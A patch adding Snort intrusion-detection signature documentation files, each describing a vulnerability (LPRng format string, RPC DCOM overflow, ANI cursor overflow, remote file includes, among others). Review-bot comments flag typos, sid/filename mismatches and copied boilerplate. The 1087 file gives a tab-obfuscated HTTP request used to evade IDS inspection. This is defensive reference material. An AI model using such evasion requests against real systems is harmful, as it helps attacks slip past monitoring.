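Review bot: the separator before Attack Scenarios is missing its leading blank line (the "--" follows "uid=0 (root)." directly), and the file has no Affected Systems section at all even though the Summary already states the affected range (Ettercap version <= 0.6.2), so add that section using the same version statement. The end of the file has a doubled separator ("-- ", blank, "--") that should be collapsed to one. Typos: "overlows" should be "overflows", "generaly" should be "generally", "pubished" should be "published". The two "Snort documentation contributed by ..." lines in Contributors use embedded tab characters to align the role text; replace them with spaces so the alignment survives different editors.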
--- /dev/null
+++ b/doc/signatures/1087.txt
@@ -0,0 +1,63 @@
+Rule:  
+
+Sid:
+1087
+
+--
+
+Summary:
+This event is generated when an attempt is made to evade an IDS in a 
+possible web attack by obfuscating the request with tabs.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+Some web servers (e.g., some versions of Apache) will interpret tabs
+as spaces in web requests.  This is used by some tools (e.g., Whisker)
+in an attempt to evade IDS systems.
+
+--
+Affected Systems:
+	All systems running a web server
+
+--
+Attack Scenarios:
+An attacker runs an automated tool, like Whisker, against a web server, or
+runs an attack by hand with a URL similar to:  GET<tab>/<tab>HTML/1.0
+
+--
+Ease of Attack:
+Simple. Automated tools are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Examine the packet to see if a web request was being made. Try to
+determine what the requested item was (e.g., a file or CGI), and determine
+from the web server's configuration whether it was a threat or not
+(e.g., whether the requested file or CGI even existed or was vulnerable).
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+--
+Additional References:
+Arachnids:  415
+URL:  www.wiretrip.net/rfp/pages/whitepapers/whiskerids.html
+
+--
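Review bot: the sample request in Attack Scenarios, "GET<tab>/<tab>HTML/1.0", uses the wrong protocol token; a request line ends with the protocol version, so it should read "GET<tab>/<tab>HTTP/1.0". The "--" separator between "Rule:" and "Sid:" is missing (every other file in this patch has one). In Contributors, "unkown" should be "unknown". The "URL:" entry under Additional References lacks the "http://" scheme that the other files' references carry, and "Arachnids:  415" would be more useful as the full URL, as done in 1268.txt with http://www.whitehats.com/info/IDS22.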
--- /dev/null
+++ b/doc/signatures/302.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 301
+
+--
+Summary:
+This event is generated when an attempt is made to escalate privileges remotely using a vulnerability in LPRng on RedHat systems.
+
+--
+Impact:
+System compromize presenting the attacker with escalated system privileges .
+
+--
+Detailed Information:
+LPRng is an implementation of the Berkeley lpr print spooling protocol. Some versions are vulnerable to a format-string attack that takes advantage of a bug in the syslog() wrapper. Successfull exploitation may present a remote attacker with the ability to execute arbitrary code using the privileges of the LPD daemon owner (typically root).
+
+Arbitrary addresses in the lpd process address space can be overwritten by sending specially crafted packets to the LPRng daemon listening on port 515 to execute arbitrary code or generate a segmentation violation.
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disallow access to LPRng port 515 from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1712
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0917
+
+--
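Review bot: the file is named 302.txt but the Sid field says 301, so either the filename or the Sid value is wrong and a lookup of sid 302 will return the wrong document (or none); reconcile the two before merging. The Attack Scenarios entry "Exploit scripts are available" is not a scenario and just repeats Ease of Attack; the Detailed Information already describes the scenario (specially crafted packets to the daemon on port 515), so move that sentence here. There is no Affected Systems section although the Summary limits the issue to LPRng on RedHat systems. Typos: "compromize" should be "compromise", "Successfull" should be "Successful", and "privileges ." has a space before the period.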
--- /dev/null
+++ b/doc/signatures/100000166.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+100000166
+
+-- 
+Summary: 
+This event is generated when a command is sent to an Oracle isqlplus instance 
+which contains a command to halt the Oracle TNS listener service.
+
+--
+Impact:
+Vulnerable Oracle servers may shut down their TNS listener service upon receipt 
+of this command, making the database unavailable for normal use until it is 
+restarted.
+
+--
+Detailed Information:
+iSQLPlus is a web interface to the Oracle SQLPlus system. A wide range of 
+commands may be sent to an Oracle server via this interface, including 
+administrative commands. If a request is sent which contains a command to halt 
+the TNS listener service, vulnerable versions of Oracle will execute the 
+command, halting the service and denying service to legitimate users until the 
+service is restarted.
+
+--
+Affected Systems:
+Oracle 9i Standard Edition 9.0.2.4
+Oracle 9i Personal Edition 9.0.2.4
+Oracle 9i Enterprise Edition 9.0.2.4
+
+--
+Attack Scenarios:
+A web browser may be used to exploit this vulnerability.
+
+--
+Ease of Attack:
+Simple, as a publicly available exploit exists which may be executed via a web 
+browser.
+
+--
+False Positives:
+Any time an authorized administrator chooses to shut down the TNS listener 
+service via the iSQLPlus interface.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the Oracle Critical Patch Update from July 2005, available at 
+http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html.
+
+--
+Contributors:
+rmkml
+Sourcefire Research Team
+
+--
+Additional References
+
+--
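Review bot: the Corrective Action section already points at the July 2005 Critical Patch Update URL, but the Additional References section is empty; repeat that URL there so it is found by tooling that only reads references. The product name is spelled "isqlplus" in the Summary and "iSQLPlus" in Detailed Information and False Positives; use one form. The "Additional References" header is missing the trailing colon that the other files use.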
--- /dev/null
+++ b/doc/signatures/1651.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1651
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
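Review bot: the first Attack Scenarios sentence, "An attacker can access an authentication mechanism and supply his/her own credentials to gain access", describes an ordinary login rather than an attack; what the Detailed Information section is getting at is weak credential validation, so the sentence should say the attacker supplies guessed or forged credentials. Typos: "running ona web server" should be "on a web server" (the same typo appears in 1727.txt, 100000418.txt and 100000817.txt in this patch) and "attackers choosing" should be "attacker's choosing".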
--- /dev/null
+++ b/doc/signatures/487.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+
+Sid:
+486
+
+--
+
+Summary:
+This event is generated when an ICMP destination unreachable
+(Communication with Destination Host is Administratively Prohibited)
+datagram is detected on the network.  
+
+--
+
+Impact:
+This message is generated when a datagram failed to traverse the
+network.  This could be an indication of routing or network problems.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large
+numbers of these messages on the network could indication routing
+problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None known.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+This rule detects informational network information, so no corrective
+action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None.
+
+
+--
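Review bot: the file is named 487.txt but the Sid field says 486; one of them is wrong and the doc will not be found for sid 487, so reconcile before merging. On content: the Summary identifies the ICMP code as "Communication with Destination Host is Administratively Prohibited", which is emitted by a filtering device (a firewall or router ACL) that deliberately dropped the packet, so the Impact and Detailed Information sections should mention filtering policy alongside "routing or network problems", and a burst of these replies to one source is worth correlating with portscan events. "could indication routing problems" in Detailed Information should read "could indicate routing problems", and "detects informational network information" in Corrective Action is redundant. The file also puts a blank line after every "--" separator, unlike the rest of the patch, and has no Affected Systems section.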
--- /dev/null
+++ b/doc/signatures/3079.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+3079
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with Microsoft's processing of an animated cursor
+file.
+
+--
+Impact:
+A successful attack may permit a buffer overflow that allows the execution
+of arbitrary code at the privilege level of the user downloading the
+malicious file.
+
+--
+Detailed Information:
+A vulnerability exists in the way the Microsoft Windows LoadImage API validates
+animated cursor (ANI) files. An invalid length associated with a structure
+supporting the properties of the animated cursor can cause a buffer overflow
+and the subsequent execution of arbirary code in the context of the current user.
+
+--
+Affected Systems:
+	Windows 98, ME, NT, 2000, XP (not SP2), and Server 2003
+
+--
+Attack Scenarios:
+An attacker can entice a user to download a malicious animated cursor
+file, causing a buffer overflow and the subsequent execution of arbitrary
+code on the vulnerable client.
+
+--
+Ease of Attack:
+Simple.  Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+In order to avoid potential evasion techniques, http_inspect should be
+configured with "flow_depth 0" so that all HTTP server response traffic is
+inspected.
+
+WARNING
+Setting flow_depth 0 will cause performance problems in some situations.
+WARNING
+
+--
+Corrective Action:
+Apply the patch(s) discussed in Microsoft bulletin MS05-002.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Microsoft Technet:
+http://www.microsoft.com/technet/security/bulletin/MS05-002.mspx
+
+--
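Review bot: the WARNING about "flow_depth 0" in False Negatives is the right caveat but is stated without a unit of scope; since the rule inspects server response bodies (the downloaded ANI file), say explicitly that the setting is needed because the default flow_depth stops inspecting the response after the first portion, which is why the rule can miss a cursor file delivered later in the reply. Typos: "arbirary" in Detailed Information should be "arbitrary" and "patch(s)" in Corrective Action should be "patch(es)". The "Additional References" header lacks the trailing colon used elsewhere.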
--- /dev/null
+++ b/doc/signatures/3256.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3256
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
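Review bot: apart from the Sid value this file is identical word for word to 3385.txt earlier in this patch, including the "Expoit" typo and the Attack Scenarios text about an overly long filename over a network share that does not match the RPC description in Detailed Information. If sids 3256 and 3385 detect different conditions in the DCOM RPC handling, the Detailed Information section should say what distinguishes them; if they are companion rules (for example the same detection on different ports), say so, and fix the typo and the mismatched scenario in both files together.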
--- /dev/null
+++ b/doc/signatures/2405.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2405
+
+--
+Summary:
+This event is generated when an attempt is made to access the file "phptest.php".
+BadBlue Personal Edition 2.4 servers could disclose confidential
+information on the software configuration towards an attacker.
+
+--
+Impact:
+Information gathering.
+This signature is usually indicative of a reconaissance probe.
+Succesful exploitation would provide the originator of the attack with the
+installation path of the software.
+
+--
+Detailed Information:
+Web servers running BadBlue Personal Edition 2.4, a
+personal file sharing server, are vulnerable to a path disclosure attack.
+When a client requests the phptest.php file from such a server, the source
+of the HTTP reply page contains the installation path of the software.
+This path can be used as information for further attacks.
+
+--
+Affected Systems:
+	BadBlue Personal Edition 2.4
+
+--
+Attack Scenarios:
+During the reconaissance phase, an attacker could obtain the installation 
+path of the BadBlue server.  This can become valuable information during 
+the later execution of directory traversal or buffer overflow attacks.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+While not a true false positive, many PHP installation howtos advise the 
+creation of a small file "phptest.php" which contains a call for the 
+phpinfo() function.  When this file is accessed legitimately by
+someone testing a fresh install, this signature will also trigger.
+
+NOTE: The amount of information provided (installation directory, version 
+numbers, environment variables), could also constitute a vulnerability 
+if this file is present on a production web server.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Snort documentation contributed by Maarten Van Horenbeeck <maarten@daemon.be>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
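Review bot: the Corrective Action ("up to date version ... vendor supplied patches") ignores the NOTE in False Positives, which already says that a phptest.php file calling phpinfo() is itself a disclosure on a production server; add "remove phptest.php and similar phpinfo() test files from production web servers" as a corrective step, since that removes the trigger regardless of BadBlue version. The Summary's second sentence ("BadBlue Personal Edition 2.4 servers could disclose confidential information on the software configuration towards an attacker") is awkward and detached from the first; something like "Versions 2.4 of BadBlue Personal Edition disclose configuration information to the requester." reads more clearly. Spelling: "reconaissance" (twice) should be "reconnaissance" and "Succesful" should be "Successful".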
--- /dev/null
+++ b/doc/signatures/100000418.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000418
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ashwebstudio Ashnews" application running on a webserver. Access to the file "ashheadlines.php" using a remote file being passed as the "pathtoashnews" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "pathtoashnews" parameter in the "ashheadlines.php" script used by the "Ashwebstudio Ashnews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ashwebstudio Ashnews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
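Review bot: the third paragraph of Detailed Information is generic CGI boilerplate about credential validation that contradicts the first paragraph, which correctly describes a remote file include via the "pathtoashnews" parameter; the same boilerplate then drives an Attack Scenarios entry about supplying credentials, which has nothing to do with including a remote file. Drop the credential paragraph and write the scenario in terms of a URL passed in "pathtoashnews". Typos and layout: "running ona web server" should be "on a web server", the file opens with two blank lines before "Rule:", there is a trailing blank line after the closing "--", and "All systems running CGI applications using Ashwebstudio Ashnews" in Affected Systems should just name the application.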
--- /dev/null
+++ b/doc/signatures/100000817.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000817
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SMF Forum" application running on a webserver. Access to the file "smf.php" using a remote file being passed as the "mosConfig_absolute_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "mosConfig_absolute_path" parameter in the "smf.php" script used by the "SMF Forum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SMF Forum
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
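Review bot: the third paragraph of "Detailed Information:" ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. ...") is generic credential-validation boilerplate that does not describe a remote file include via "mosConfig_absolute_path" in "smf.php", and it carries the typo "ona"; drop it or replace it with a sentence on how the parameter value is used to include the remote file. Also in this hunk: "Affected Systems:" reads "All systems running CGI applications using SMF Forum" without a version; the blank line before "--" is missing after "Sid:", "Affected Systems:" and "Contributors:" (every other file in the patch has it); "attackers choosing" should be "attacker's choosing" in "Impact:" and "Detailed Information:"; and "Additional References:" is empty although "Ease of Attack:" claims "Exploits exist."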
--- /dev/null
+++ b/doc/signatures/1727.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1727
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
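Review bot: "Summary:" says only that the rule fires on "a known vulnerability in a CGI web application running on a server" and never names the script or application that Sid 1727 matches, so an analyst reading the event cannot tell what was targeted; name the CGI program and the vulnerability in "Summary:" and "Detailed Information:" and cite it under the empty "Additional References:". Also fix "running ona web server" ("on a") and "attackers choosing" ("attacker's choosing") in "Detailed Information:" and "Impact:".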
--- /dev/null
+++ b/doc/signatures/1707.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1707
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
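Review bot: apart from the Sid, this file is word-for-word identical to 1727.txt in the previous hunk, including the "running ona web server" typo and the empty "Additional References:", so the documentation gives no way to distinguish the two rules; each file should name the CGI script its Sid matches and cite the corresponding advisory, and the shared boilerplate should be fixed in both.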
--- /dev/null
+++ b/doc/signatures/3349.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3349
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
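Review bot: "Attack Scenarios:" ("An attacker may make a request for a file with an overly long filename via a network share.") describes a file-share overflow and contradicts "Detailed Information:", which says the trigger is a malformed DCOM request sent over RPC; rewrite the scenario to match the RPC DCOM description. Also "Expoit code exists." should read "Exploit code exists.", and "Additional References:" is empty where the Microsoft security bulletin for this RPC DCOM issue should be cited, since "Corrective Action:" tells the reader to "Apply the appropriate vendor supplied patches" without saying which.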
--- /dev/null
+++ b/doc/signatures/2916.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2916
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure unregister_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
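Review bot: the last paragraph of "Detailed Information:" is broken so that the sentence-ending period starts its own line ("vulnerability in the procedure unregister_snapshot_repgroup" / "." / "This procedure is included in"); join it into "vulnerability in the procedure unregister_snapshot_repgroup. This procedure is included in sys.dbms_repcat_sna." Also "Affected Systems:" reads "Oracle Oracle9i" (duplicated word), "Corrective Action:" lacks a period after "patch", "None Known" is capitalised differently from the "None known." used elsewhere in the patch, and several "--" separators carry trailing whitespace.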
--- /dev/null
+++ b/doc/signatures/1936.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+1936
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow condition in the Post Office Protocol (POP) command AUTH.
+
+--
+Impact:
+Possible remote execution of arbitrary code leading to a remote root 
+compromise.
+
+--
+Detailed Information:
+A vulnerability exists such that an attacker may overflow a buffer by 
+sending data where a line feed character should occur to a POP server 
+via the AUTH command.
+
+--
+Attack Scenarios:
+Simple. An attacker can supply specially crafted packets to a POP server
+via the AUTH function. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
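Review bot: this file has no "Affected Systems:" section, which every other signature file in the patch carries; add one naming the POP server implementation(s) whose AUTH command handling overflows, since "Corrective Action:" ("Upgrade to the latest non-affected version of the software.") also never says which software is meant. Also "Attack Scenarios:" opens with "Simple.", an ease-of-attack rating that already appears under "Ease of Attack:"; drop it from the scenario. "Additional References:" is empty; a reference for the AUTH overflow would resolve the missing product name as well.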
--- /dev/null
+++ b/doc/signatures/561.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+561
+
+--
+Summary:
+This event is generated when a known response to a sucessful attack is
+detected.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when a known response to a sucessful attack is
+detected. Some applications do not perform stringent checks when validating
+the credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can be
+compromised and trust relationships between the victim server and other
+hosts can be exploited by the attacker.
+
+Events generated by rules in attack-responses.rules may indicate that an
+attack against a host has been sucessful.
+
+--
+Affected Systems:
+	Any vulnerable host.
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. An attacker might also exploit a
+weakness in a particular application or piece of software that will
+present the opportunity to gain access to the host.
+
+--
+Ease of Attack:
+Simple. Many exploits exist for various systems and software.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Care should be taken to investigate the source of the event. Check for
+signs of system compromise in log files. Check for listening services on
+high ports.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+OpenNap Specification
+http://opennap.sourceforge.net/napster.txt
+
+--
